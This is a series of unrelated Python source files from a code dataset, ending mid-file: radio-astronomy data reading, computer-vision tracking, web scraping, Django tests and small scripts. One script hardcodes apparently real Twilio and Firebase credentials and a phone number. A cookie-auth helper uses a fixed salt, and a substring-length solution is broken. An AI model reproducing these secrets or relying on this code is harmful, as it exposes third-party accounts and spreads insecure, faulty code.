2\n # Wrap matrix data into 2 x 2 blocks.\n if self.is_set(block['data_type'], self.DataType.Matrix):\n n = block['block_length']\n block['data'] = block['data'].reshape(n // 4, 2, 2)\n\n if block['flag_crc']:\n # TODO(BM) implement CRC check. e.g. http://goo.gl/IfyyOO\n f.read(4)\n\n def read_data(self):\n \"\"\".\"\"\"\n f = self.file_handle\n block_id = 0\n while f.read(3) == b'TBG':\n block = self.read_block_header(block_id)\n self.read_block_data(block)\n block_id += 1\n\n def read(self):\n \"\"\".\"\"\"\n self.read_header()\n self.read_data()\n\n def date_time(self):\n gid = self.Group.Standard\n tid = self.Standard.DateTime\n if gid in self.record and tid in self.record[gid]:\n assert len(self.record[gid][tid]) == 1, \\\n 'Expecting only one standard group, date-time tag!'\n return self.record[gid][tid][0]['data']\n\n def user(self):\n gid = self.Group.Standard\n tid = self.Standard.UserName\n if gid in self.record and tid in self.record[gid]:\n assert len(self.record[gid][tid]) == 1, \\\n 'Expecting only one standard group, user tag!'\n return self.record[gid][tid][0]['data']\n\n def settings(self):\n gid = self.Group.Settings\n tid = self.Settings.File\n if gid in self.record and tid in self.record[gid]:\n assert len(self.record[gid][tid]) == 1, \\\n 'Expecting only one standard group, settings tag!'\n return self.record[gid][tid][0]['data']\n\n def print_summary(self):\n for group_id in self.record:\n group_data = self.record[group_id]\n for tag_id in group_data:\n tag_data = group_data[tag_id]\n for index in tag_data:\n block = tag_data[index]\n print('[%03i]' % block['number'], end=' ')\n block_id = '%i.%i.%i' % (group_id, tag_id, index)\n print('%-9s' % block_id, end=' ')\n if block['flag_crc']:\n print('crc', end=' ')\n print('')\n\n\nclass OskarVis(OskarBinary):\n\n \"\"\".\"\"\"\n\n class VisHeader:\n TelescopePath = 1\n NumVisBlockTags = 2\n FlagAutoCorrelation = 3\n FlagCrossCorrelation = 4\n VisDataType = 5\n CoordDataType = 6\n MaxTimes = 7\n NumTimes = 8\n MaxChannels = 9\n NumChannels = 10\n NumStations = 11\n PolarisationType = 12\n 
PhaseCentreCoordType = 21\n PhaseCentre = 22\n StartFrequency = 23\n FrequencyIncrement = 24\n ChannelBandwidth = 25\n StartTime = 26\n TimeInterval = 27\n TimeIntegration = 28\n TelescopeLon = 29\n TelescopeLat = 30\n TelescopeAlt = 31\n StationX = 32\n StationY = 33\n StationZ = 34\n\n class VisBlock:\n Dims = 1\n AutoCorrelation = 2\n CrossCorrelation = 3\n UU = 4\n VV = 5\n WW = 6\n\n class PolarisationType:\n IQUV = 0,\n I = 1,\n Q = 2,\n U = 3,\n V = 4,\n Linear = 10,\n XX = 11,\n XY = 12,\n YX = 13,\n YY = 14\n\n def __init__(self, file_name):\n\n OskarBinary.__init__(self, file_name)\n # super(OskarVis, self).print_summary()\n if not self.bin_ver == 2:\n raise ValueError(\"Only OSKAR binary format version-2.0 files \"\n \"can be read by this class.\")\n\n # Make local copies of visibility header variables.\n vis_header = self.record[self.Group.VisHeader]\n assert len(vis_header) == 26, \\\n 'Expecting the visibility header to have 26 tags!'\n self.block_length = vis_header[self.VisHeader.MaxTimes][0]['data']\n self.num_times = vis_header[self.VisHeader.NumTimes][0]['data']\n self.num_channels = vis_header[self.VisHeader.NumChannels][0]['data']\n self.num_stations = vis_header[self.VisHeader.NumStations][0]['data']\n self.num_baselines = self.num_stations * (self.num_stations - 1) // 2\n self.num_blocks = int(numpy.ceil(float(self.num_times) /\n self.block_length))\n self.pol_type = vis_header[self.VisHeader.PolarisationType][0]['data']\n self._start_time = vis_header[self.VisHeader.StartTime][0]['data']\n self._time_interval = vis_header[self.VisHeader.TimeInterval][0]['data']\n self._phase_centre_type = vis_header[self.VisHeader.PhaseCentreCoordType][0]['data']\n self._phase_centre = vis_header[self.VisHeader.PhaseCentre][0]['data']\n self._cross_correlation = vis_header[self.VisHeader.FlagCrossCorrelation][0]['data']\n self._auto_correlation = vis_header[self.VisHeader.FlagAutoCorrelation][0]['data']\n\n self.telescope_path = vis_header[self.VisHeader.TelescopePath][0]['data'].tostring().decode()[:-1]\n self.telescope_lon = vis_header[self.VisHeader.TelescopeLon][0]['data']\n self.telescope_lat = vis_header[self.VisHeader.TelescopeLat][0]['data']\n self.telescope_alt = vis_header[self.VisHeader.TelescopeAlt][0]['data']\n self.station_x = vis_header[self.VisHeader.StationX][0]['data']\n self.station_y = vis_header[self.VisHeader.StationY][0]['data']\n self.station_z = vis_header[self.VisHeader.StationZ][0]['data']\n\n #\n # block_dims = self.data[self.Group.VisBlock][self.VisBlock.Dims]\n # for index in block_dims:\n # print index, block_dims[index]['data']\n\n def uvw(self, flatten=False):\n # FIXME(BM) handle channels?\n # FIXME(BM) uvw coordinates when auto-correlations are present.\n group = self.Group.VisBlock\n tag_uu = self.VisBlock.UU\n tag_vv = self.VisBlock.VV\n tag_ww = self.VisBlock.WW\n uu = numpy.empty((self.num_times, self.num_baselines), dtype='f8')\n vv = numpy.empty((self.num_times, self.num_baselines), dtype='f8')\n ww = numpy.empty((self.num_times, self.num_baselines), dtype='f8')\n for index in range(0, self.num_blocks):\n block_dims = self.record[group][self.VisBlock.Dims][index]['data']\n block_times = block_dims[2]\n block_time_start = block_dims[0]\n block_baselines = block_dims[4]\n assert block_baselines == self.num_baselines, \\\n \"Data dimension mismatch\"\n assert block_times <= self.block_length, \\\n \"Invalid block length ?!.\"\n uu_block = self.record[group][tag_uu][index]['data']\n uu_block = uu_block[0:block_baselines * block_times]\n uu_block = uu_block.reshape((block_times, block_baselines))\n uu[block_time_start:block_time_start + block_times, :] = uu_block\n vv_block = self.record[group][tag_vv][index]['data']\n vv_block = vv_block[0:block_baselines * block_times]\n vv_block = vv_block.reshape((block_times, block_baselines))\n vv[block_time_start:block_time_start + block_times, :] = vv_block\n ww_block = self.record[group][tag_ww][index]['data']\n ww_block = ww_block[0:block_baselines * block_times]\n ww_block = ww_block.reshape((block_times, block_baselines))\n ww[block_time_start:block_time_start + block_times, :] = ww_block\n # FIXME(BM): The data starts flat so if flatten, just don't reshape?\n if flatten:\n uu = uu.flatten()\n vv = vv.flatten()\n ww = ww.flatten()\n return uu, vv, ww\n\n def amplitudes(self, flatten=False):\n group = self.Group.VisBlock\n tag = self.VisBlock.CrossCorrelation\n tag_dims = self.VisBlock.Dims\n\n if self.pol_type == self.PolarisationType.I:\n amp = numpy.empty((self.num_times, self.num_baselines), dtype='c16')\n for index in range(0, self.num_blocks):\n block_dims = self.record[group][tag_dims][index]['data']\n block_time_start = block_dims[0]\n block_times = block_dims[2]\n block_baselines = block_dims[4]\n assert block_baselines == self.num_baselines, \\\n \"Data dimension mismatch\"\n assert block_times <= self.block_length, \\\n \"Invalid block length ?!.\"\n amp_block = self.record[group][tag][index]['data']\n amp_block = amp_block[0:block_baselines * block_times]\n amp_block = amp_block.reshape((block_times, block_baselines))\n amp[block_time_start:block_time_start + block_times, :] = \\\n amp_block\n if flatten:\n amp = amp.flatten()\n return amp\n\n elif self.pol_type == self.PolarisationType.Linear:\n amp = numpy.empty((self.num_times, self.num_baselines, 2, 2),\n dtype='c16')\n for index in range(0, self.num_blocks):\n block_dims = self.record[group][tag_dims][index]['data']\n block_time_start = block_dims[0]\n block_times = block_dims[2]\n block_baselines = block_dims[4]\n assert block_baselines == self.num_baselines, \\\n \"Data dimension mismatch\"\n assert block_times <= self.block_length, \\\n \"Invalid block length ?!.\"\n amp_block = self.record[group][tag][index]['data']\n amp_block = amp_block[0:block_baselines * block_times]\n amp_block = amp_block.reshape((block_times, block_baselines,\n 2, 2))\n amp[block_time_start:block_time_start + block_times, :] = \\\n amp_block\n if flatten:\n amp = amp.reshape(self.num_baselines * self.num_times, 2, 2)\n return amp\n\n def stokes_i(self, flatten=True):\n amp = self.amplitudes(flatten)\n if len(amp.shape) > 1:\n if self.pol_type == self.PolarisationType.Linear:\n amp = 0.5 * (amp[:, 0, 0] + amp[:, 1, 1])\n else:\n raise ValueError('Unexpected polarisation type.')\n return amp\n\n def times(self, flatten=False):\n \"\"\" Returns visibility times in MDJ UTC \"\"\"\n time_interval_mjd = self._time_interval / (3600.0 * 24.0)\n times = self._start_time + time_interval_mjd * numpy.arange(self.num_times)\n if flatten:\n return numpy.repeat(times, int(self.num_baselines))\n else:\n return numpy.transpose(numpy.tile(times, (int(self.num_baselines), 1)))\n\n def stations(self, flatten=False):\n assert self._cross_correlation, \\\n \"Reading non-cross-correlation data not fully supported yet!\"\n\n # Order according to documentation is 0-1, 0-2, 0-3... 1-2, ...\n station1 = numpy.repeat(numpy.arange(self.num_stations),\n self.num_stations-1 - numpy.arange(self.num_stations))\n station2 = numpy.hstack([numpy.arange(start+1, self.num_stations)\n for start in numpy.arange(self.num_stations)])\n # Tile in one or two dimensions depending on whether we want a\n # flat result\n tiles = (int(self.num_times) if flatten else [int(self.num_times), 1])\n return numpy.tile(station1, tiles), numpy.tile(station2, tiles)\n\n def phase_centre(self, flatten=False):\n \"\"\" Returns RA and DEC of the phase centre in degrees \"\"\"\n assert self._phase_centre_type == 0, \\\n \"Unknown phase centre type %d!\" % self._phase_centre_type\n return (self._phase_centre[0], self._phase_centre[1])\n\n def frequency(self, channel=0):\n group = self.Group.VisHeader\n tag = self.VisHeader.StartFrequency\n index = 0\n start_freq = self.record[group][tag][index]['data']\n tag = self.VisHeader.FrequencyIncrement\n freq_inc = self.record[group][tag][index]['data']\n return start_freq + channel * freq_inc\n\n def print_summary(self, verbose=False):\n print('No. times : %i' % self.num_times)\n print('No. channels : %i' % self.num_channels)\n print('No. baselines : %i' % self.num_baselines)\n if verbose:\n for group_id in self.record:\n group_data = self.record[group_id]\n for tag_id in group_data:\n tag_data = group_data[tag_id]\n for index in tag_data:\n block = tag_data[index]\n print('[%03i]' % block['number'], end=' ')\n block_id = '%i.%i.%i' % (group_id, tag_id, index)\n print('%-9s' % block_id, end=' ')\n group_name = ''\n if group_id == self.Group.VisHeader:\n group_name = 'VisHeader'\n if group_id == self.Group.VisBlock:\n group_name = 'VisBlock'\n print('%-15s' % group_name, end=' ')\n if block['flag_crc']:\n print('crc', end=' ')\n print('')\n\n\ndef import_visibility_from_oskar(oskar_file: str) -> Visibility:\n \"\"\" Import a visibility set from an OSKAR visibility file\n\n :param oskar_file: Name of OSKAR visibility file\n :returns: Visibility\n \"\"\"\n \n # Extract data from Oskar file\n oskar_vis = OskarVis(oskar_file)\n ra, dec = oskar_vis.phase_centre()\n a1, a2 = oskar_vis.stations(flatten=True)\n \n # Make configuration\n location = EarthLocation(lon=oskar_vis.telescope_lon,\n lat=oskar_vis.telescope_lat,\n height=oskar_vis.telescope_alt)\n antxyz = numpy.transpose([oskar_vis.station_x,\n oskar_vis.station_y,\n oskar_vis.station_z])\n config = Configuration(\n name=oskar_vis.telescope_path,\n location=location,\n xyz=antxyz\n )\n \n # Construct visibilities\n return Visibility(\n frequency=[oskar_vis.frequency(i) for i in range(oskar_vis.num_channels)],\n phasecentre=SkyCoord(frame=ICRS, ra=ra, dec=dec, unit=u.deg),\n configuration=config,\n uvw=numpy.transpose(oskar_vis.uvw(flatten=True)),\n time=oskar_vis.times(flatten=True),\n antenna1=a1,\n antenna2=a2,\n vis=oskar_vis.amplitudes(flatten=True),\n weight=numpy.ones(a1.shape))\n","sub_path":"util/read_oskar_vis.py","file_name":"read_oskar_vis.py","file_ext":"py","file_size_in_byte":22576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"321850481","text":"\nf = open('art_ascii.txt', 'r')\n\ndots = []\nfull = ''\nn = 1\nfor l in f:\n print(l[46:-1])\n if n == 1:\n full += l[46 + 8:-1].ljust(8,' ')\n n +=1\n continue\n\n\n #dots.append(l[46:-1].ljust(16,' '))\n full += l[46:-1].ljust(16,' ')\n n+=1\n print(len(l[46:-1].ljust(16,' ')))\n\n\nprint(len(dots))\nprint(len(full))\n#print(full)\nprint(full[-300:-1])\nf.close()\n\n\n\nfor j in range(4,30):\n 
print('-*******************')\n print(j)\n print('-*******************')\n for i in range(int(len(full) / j)):\n print(full[i * j: (i + 1) * j])\n\n\n\n'''\nfor i in range(2, 20):\n #if len(dots) % i != 0: continue\n print('-*******************')\n print(i)\n print('-*******************')\n for j in range(int(len(dots)/ i)):\n s = ''\n for k in range(i):\n s += dots[i * j + k]\n\n print(s)\n'''\n","sub_path":"art_ascii.py","file_name":"art_ascii.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"241896380","text":"import logging\nimport cv2\nimport imutils\nimport numpy as np\nfrom collections import deque\n\ngreen_lower = (29, 86, 6)\ngreen_upper = (64, 255, 255)\n\nclass Processor(object):\n \"\"\"\n Defines a class to apply additional processing to the image\n returned by the callback\n \"\"\"\n\n def __init__(self, notify_cb = None):\n \"\"\"\n Constructor\n \"\"\"\n\n self.width = 320\n self.height = 240\n self.pts = deque(maxlen = 10)\n self.notify_cb = notify_cb\n\n def cleanup(self):\n pass\n\n def image_process_entry(self, bgr_image, width, height):\n \"\"\"\n Called each time an image can be processed\n \"\"\"\n # Blur the image\n #MED_FILTER_APRTRE_SIZE = 5 # Must be odd number\n #bgr_blur_image = cv2.medianBlur(bgr_image, MED_FILTER_APRTRE_SIZE)\n\n # Convert the image from 'BGR' to HSV colour space\n #hsv_image = cv2.cvtColor(bgr_blur_image, cv2.COLOR_BGR2HSV)\n\n blurred = cv2.GaussianBlur(bgr_image, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n # construct a mask for the color \"green\", then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n mask = cv2.inRange(hsv, green_lower, green_upper)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n # find contours in the mask and initialize the current\n # (x, y) center of the ball\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n center = None\n\n # only proceed if at least one contour was found\n if cnts:\n # find the largest contour in the mask, then use\n # it to compute the minimum enclosing circle and\n # centroid\n c = max(cnts, key=cv2.contourArea)\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n # only proceed if the radius meets a minimum size\n if radius > 10:\n # draw the circle and centroid on the frame,\n # then update the list of tracked points\n cv2.circle(bgr_image, (int(x), int(y)), int(radius),\n (0, 255, 255), 2)\n cv2.circle(bgr_image, center, 5, (0, 0, 255), -1)\n\n self.pts.appendleft(center)\n\n print(center)\n\n if self.notify_cb is not None:\n self.notify_cb(center)\n\n # loop over the set of tracked points\n for i in range(1, len(self.pts)):\n # if either of the tracked points are None, ignore\n # them\n if self.pts[i - 1] is None or self.pts[i] is None:\n continue\n\n # otherwise, compute the thickness of the line and\n # draw the connecting lines\n thickness = int(np.sqrt(10 / float(i + 1)) * 2.5)\n cv2.line(bgr_image, self.pts[i - 1], self.pts[i], (0, 0, 255), thickness)\n\n # Capture a key press. 
The function waits argument in ms\n # for any keyboard event\n # For some reason image does not show without this!\n cv2.waitKey(1) & 0xFF\n","sub_path":"image/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"467813749","text":"import pyons\nimport itertools\n\n\nclass Model:\n    def __init__(self):\n        self.command_index = itertools.count()\n        self.reply_timeout = 1.0\n        self.next_ping_timeout = 4.0\n        self.num_pings_generated = 0\n        self.num_pongs_generated = 0\n\n\nclass Message(object):\n    def __init__(self, name, index):\n        self.name = name\n        self.index = index\n\n    def __str__(self):\n        return \"{}-{}\".format(self.name, self.index)\n\n\n@pyons.static_initializer(stage='1-base')\ndef initialize(model):\n    pyons.info(\"PingPong is initializing\", sender=\"initialize\")\n    cmd = Message('PING', next(model.command_index))\n    model.num_pings_generated += 1\n    pyons.schedule(cmd, 0)\n\n\n@pyons.static_handler(lambda event: event.name[:4].lower() == 'ping')\ndef ping_handler(event, model):\n    reply = Message('PONG', event.index)\n    model.num_pongs_generated += 1\n    pyons.schedule(reply, model.reply_timeout)\n    pyons.info(\"received {}, sending {} in {} sec.\".format(event, reply, model.reply_timeout), sender=\"ping_handler\")\n\n\n@pyons.static_handler(lambda event: event.name[:4].lower() == 'pong')\ndef pong_handler(event, model):\n    cmd = Message('PING', next(model.command_index))\n    model.num_pings_generated += 1\n    pyons.schedule(cmd, model.next_ping_timeout)\n    pyons.info(\"received {}, sending {} in {} sec.\".format(event, cmd, model.next_ping_timeout), sender=\"pong_handler\")\n\n\n@pyons.static_finalizer()\ndef finalize(model):\n    pyons.info(\"PingPong is finished:\", sender=\"finalize\")\n    print(\"\\t+ pings generated: {}\".format(model.num_pings_generated))\n    print(\"\\t+ pongs generated: {}\".format(model.num_pongs_generated))\n    print(\"\\t+ events generated: {}\".format(pyons.Kernel().num_events_handled))\n\n    events = ['{}@t={}'.format(envelope.event, envelope.fire_time) for envelope in pyons.Kernel().events]\n    print(\"\\t+ resting events: {}\".format(events))\n\n\n@pyons.static_stop_condition(guard=lambda kernel: kernel.num_events_handled % 2 == 0)\ndef check_generated_enough(model):\n    return model.num_pongs_generated >= 3\n\n\nif __name__ == '__main__':\n    m = Model()\n    pyons.setup_env(log_level=pyons.LogLevel.DEBUG, sender_field_width=12, time_precision=2)\n    pyons.run(model=m, max_events=100)\n","sub_path":"examples/pingpong_1.py","file_name":"pingpong_1.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"51495919","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 22:10:33 2021\n\n@author: Philippe\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport string\nimport csv as csv\nimport pandas as pd\n\nbase = 'https://crs.upd.edu.ph/schedule/'\nyear = '120202/'\nletter = 'A'\n\n\n\ndef save_html(url, path):\n    r = requests.get(url)\n    with open(path, 'wb') as f:\n        f.write(r.content)\n    \n    \ndef open_html(path):\n    with open(path, 'rb') as f:\n        return f.read()\n    \ndef access_html(letter):\n    print('checking letter : ' + letter)\n    url = base + year + letter\n    r = requests.get(url)\n    html = r.content\n    \n    soup = BeautifulSoup(html, 'html.parser')\n    rows = soup.select('tbody tr')\n    data = []\n    \n    if(len(rows) == 1):\n        return data\n    \n    for row in rows:\n        d 
= dict()\n        d['course number'] = row.findAll('td')[0].text.strip()\n        print(d['course number'])\n        if (not (d['course number'].isnumeric())):\n            continue\n        d['name'] = row.findAll('td')[1].text.strip()\n        d['units'] = row.findAll('td')[2].text.strip()\n        d['schedule'] = row.findAll('td')[3].text.strip().split('\\n')[0].rsplit(\" \", 2)[0]\n        print(d['schedule'])\n        \n        if (len(row.findAll('td')[3].text.strip().split('\\n')) == 1 ):\n            d['professor'] = d['schedule']\n            d['schedule'] = \"TBA\"\n            continue\n        \n        d['professor'] = row.findAll('td')[3].text.strip().split('\\n')[1].strip('\\t')\n        \n        data.append(d)\n    print(data[0])\n    return data\n\ndef create_csv():\n    mycsv = []\n    for letter in list(string.ascii_uppercase):\n        result = access_html(letter)\n        if result:\n            mycsv = mycsv + result\n    \n    \n    \n    keys = mycsv[0].keys()\n    \n    with open('crs.csv', 'a', newline='') as output_file:\n        dict_writer = csv.DictWriter(output_file,keys)\n        dict_writer.writeheader()\n        dict_writer.writerows(mycsv)\n\ndef load_csv():\n    data = pd.read_csv('crs.csv', encoding = \"ISO-8859-1\", engine='python')\n    data.head()\n    return data\n\ndef filter_subject(mycsv, search_name):\n    return mycsv[mycsv[\"name\"].str.contains(search_name, na=False, case=False)]\n\nclass Course:\n    def __init__(self, id, courseName, teacher, meetingTime):\n        self._id = id\n        self._courseName = courseName\n        self._teacher = teacher\n        self._meetingTime = meetingTime\n        \nclass Subject:\n    def __init__(self, name):\n        self._name = name\n        self._courses = []\n    def get_courses(self):\n        return self._courses\n    \n    \n    \n    \nsubjectList = []\n\nsample_input = [\"Fil 40\", \"MS 1\" , \"CW 10\", \"CoE 115\"]\nlength = len(sample_input)\nmycsv = load_csv()\n\npossible_subjects = []\nfor input in sample_input:\n    newSubject = Subject(input)\n    #possible_subjects.append(filter_subject(mycsv, input))\n    for index, row in filter_subject(mycsv, input).iterrows():\n        newSubject._courses.append(Course(row['course number'], row['name'], row['professor'], row['schedule']))\n        #print(\"Name: \" + str(row['name']))\n    subjectList.append(newSubject)\n    #mylist = [(Course(id, row.name, row.professor, row.schedule)) for index, row in filter_subject(mycsv, input).items()]\n    \n\nfor subject in subjectList:\n    print(\"\\n\\n\\t\\t\\t\\tSubject Name: \" + str(subject._name))\n    for courses in subject._courses:\n        print(\"Course Name: \" + courses._courseName)\n        print(\"Meeting Times: \" + courses._meetingTime)\n        print(\"Professor: \" + courses._teacher)\n\n\n\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"427788139","text":"import unittest\nfrom unittest.mock import patch, Mock\n\nfrom django.test import TestCase\n\nfrom todo.forms import (\n    DUPLICATE_ITEM_ERROR, EMPTY_ITEM_ERROR,\n    ExistingListItemForm, ItemForm, NewListForm\n)\nfrom todo.models import Item, List\n\n\nNEW_ITEM_TEXT = 'new item text'\n\n\nclass ItemFormTest(TestCase):\n\n    def test_form_item_input_has_placeholder_and_css_classes(self):\n        form = ItemForm()\n        self.assertIn('placeholder=\"Enter a to-do item\"', form.as_p())\n        self.assertIn('class=\"form-control input-lg\"', form.as_p())\n\n    def test_form_validation_for_blank_items(self):\n        form = ItemForm(data={'text': ''})\n        self.assertFalse(form.is_valid())\n        self.assertEqual(form.errors['text'], [EMPTY_ITEM_ERROR])\n\n\nclass NewListFormTest(unittest.TestCase):\n\n    @patch('todo.forms.List.createNew')\n    def 
test_save_with_not_authenticated_user_creates_new_list_form_post_data(\n            self, mock_List_create_new\n    ):\n        user = Mock(is_authenticated=lambda: False)\n        form = NewListForm(data={'text': NEW_ITEM_TEXT})\n        form.is_valid()\n        form.save(owner=user)\n        mock_List_create_new.assert_called_once_with(\n            first_item_text=NEW_ITEM_TEXT\n        )\n\n    @patch('todo.forms.List.createNew')\n    def test_save_with_authenticated_user_creates_new_list_with_owner(\n            self, mock_List_create_new\n    ):\n        user = Mock(is_authenticated=lambda: True)\n        form = NewListForm(data={'text': NEW_ITEM_TEXT})\n        form.is_valid()\n        form.save(owner=user)\n        mock_List_create_new.assert_called_once_with(\n            first_item_text=NEW_ITEM_TEXT, owner=user\n        )\n\n    @patch('todo.forms.List.createNew')\n    def test_save_returns_new_list_object(self, mock_List_create_new):\n        user = Mock(is_authenticated=lambda: True)\n        form = NewListForm(data={'text': NEW_ITEM_TEXT})\n        form.is_valid()\n        res = form.save(owner=user)\n        self.assertEqual(res, mock_List_create_new.return_value)\n\n\nclass ExistingListItemFormTest(TestCase):\n\n    def test_form_renders_item_text_input(self):\n        todo_list = List.objects.create()\n        form = ExistingListItemForm(for_list=todo_list)\n        self.assertIn('placeholder=\"Enter a to-do item\"', form.as_p())\n\n    def test_form_validation_for_blank_items(self):\n        todo_list = List.objects.create()\n        form = ExistingListItemForm(for_list=todo_list, data={'text': ''})\n        self.assertFalse(form.is_valid())\n        self.assertEqual(form.errors['text'], [EMPTY_ITEM_ERROR])\n\n    def test_form_validation_for_duplicate_items(self):\n        todo_list = List.objects.create()\n        Item.objects.create(todo_list=todo_list, text='no duplicates')\n        form = ExistingListItemForm(for_list=todo_list, data={'text': 'no duplicates'})\n        self.assertFalse(form.is_valid())\n        self.assertEqual(form.errors['text'], [DUPLICATE_ITEM_ERROR])\n\n    def test_form_save(self):\n        todo_list = List.objects.create()\n        form = ExistingListItemForm(for_list=todo_list, data={'text': 'hi'})\n        new_item = form.save()\n        self.assertEqual(new_item, Item.objects.all()[0])\n","sub_path":"todo/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"547012999","text":"'''给定一个字符串,找出不含有重复字符的最长子串的长度。\n\n示例:\n\n给定 \"abcabcbb\" ,没有重复字符的最长子串是 \"abc\" ,那么长度就是3。\n\n给定 \"bbbbb\" ,最长的子串就是 \"b\" ,长度是1。\n\n给定 \"pwwkew\" ,最长子串是 \"wke\" ,长度是3。请注意答案必须是一个子串,\"pwke\" 是 子序列 而不是子串。\n\n'''\n\n\nclass Solution:\n    def lengthOfLongestSubstring(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        if len(s)<2:\n            return len(s)\n        dic={}\n        start=0\n        max_length=0\n        for i in range(len(s)):\n            if s[i] in dic and dic[s[i]]>start:\n                start=dic[s[i]]+1\n\n            max_length=max(i-dic[s[i]],max_length)\n        return max_length\n\n","sub_path":"nuSolved/3. 无重复字符的最长子串.py","file_name":"3. 
无重复字符的最长子串.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"93907166","text":"import serial\r\nimport time\r\nimport thingspeak\r\nimport pyrebase\r\nfrom twilio.rest import Client\r\n#import firebase\r\nchannel_id = 1211863\r\nread_key ='K1FJFQPPHZ8QWZEO'\r\nser = serial.Serial('COM6',115200)\r\nchannel = thingspeak.Channel(id=channel_id, api_key=read_key)\r\nconfig = {\r\n    \"apiKey\": \"AIzaSyCse3HpG_aSAMoCZ468TVDsWfgTqGCjlAs\",\r\n    \"authDomain\": \"rt-heart-pluse-analysis.firebaseapp.com\",\r\n    \"databaseURL\": \"https://rt-heart-pluse-analysis-default-rtdb.firebaseio.com/\",\r\n    \"storageBucket\": \"rt-heart-pluse-analysis.appspot.com\"\r\n}\r\nfirebase = pyrebase.initialize_app(config)\r\ndb = firebase.database()\r\naccount_sid = 'ACddd892bad27fe97f17d7140b5adbbcad' \r\nauth_token = '3ef7ab34695b233f16410db06f56b607'\r\nclient = Client(account_sid, auth_token) \r\nwhile 1:\r\n    data= ser.readline().rstrip()\r\n    print(\" heart rate :\"+ str(data))\r\n    response = channel.update({'field1':data})\r\n    data1={\"heart_rate\":str(data)}\r\n    db.child(\"real time data\").child(\"1-set\").set(data1)\r\n    message = client.messages.create( \r\n                              from_='whatsapp:+14155238886',  \r\n                              body=(\"heart_pluse of patient :\"+str(data)),      \r\n                              to='whatsapp:+917619398922' \r\n                          ) \r\n    print(message.sid)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"146598141","text":"import hashlib\r\nfrom datetime import timedelta\r\nfrom typing import Optional\r\n\r\nfrom pyramid.request import Request\r\nfrom pyramid.response import Response\r\n\r\nfrom rxit_utils.infrastructure.number_utils import try_int\r\n\r\nauth_cookie_name = \"e45k0gifdtebz07r8f30smjdb9rf4d\"\r\n\r\ndef set_auth(request: Request, user_id: int):\r\n    hash_val = __hash_text(str(user_id))\r\n    val = \"{}:{}\".format(user_id, hash_val)\r\n\r\n    request.add_response_callback(\r\n        lambda req, resp: __add_cookie_callback(req, resp, auth_cookie_name, val)\r\n    )\r\n\r\n\r\ndef __hash_text(text: str) -> str:\r\n    text = \"salty__\" + text + \"__text\"\r\n    return hashlib.sha512(text.encode(\"utf-8\")).hexdigest()\r\n\r\n\r\ndef __add_cookie_callback(_, response: Response, name: str, value: str):\r\n    response.set_cookie(name, value, max_age=timedelta(days=7))\r\n\r\n\r\ndef get_user_id_via_auth_cookie(request: Request) -> Optional[int]:\r\n    if auth_cookie_name not in request.cookies:\r\n        return None\r\n\r\n    val = request.cookies[auth_cookie_name]\r\n    parts = val.split(\":\")\r\n    if len(parts) != 2:\r\n        return None\r\n\r\n    user_id = parts[0]\r\n    hash_val = parts[1]\r\n    hash_val_check = __hash_text(user_id)\r\n    if hash_val != hash_val_check:\r\n        print(\"Warning: Hash mismatch, invalid cookie value\")\r\n        return None\r\n\r\n    return try_int(user_id)\r\n\r\n\r\ndef logout(request: Request):\r\n    request.add_response_callback(\r\n        lambda req, resp: __delete_cookie_callback(resp, auth_cookie_name)\r\n    )\r\n\r\n\r\ndef __delete_cookie_callback(response: Response, name: str):\r\n    response.delete_cookie(name)\r\n","sub_path":"rxit_utils/infrastructure/cookie_auth.py","file_name":"cookie_auth.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"534763792","text":"from __future__ import division\n\n#pywikibot\nimport pywikibot\nfrom pywikibot import 
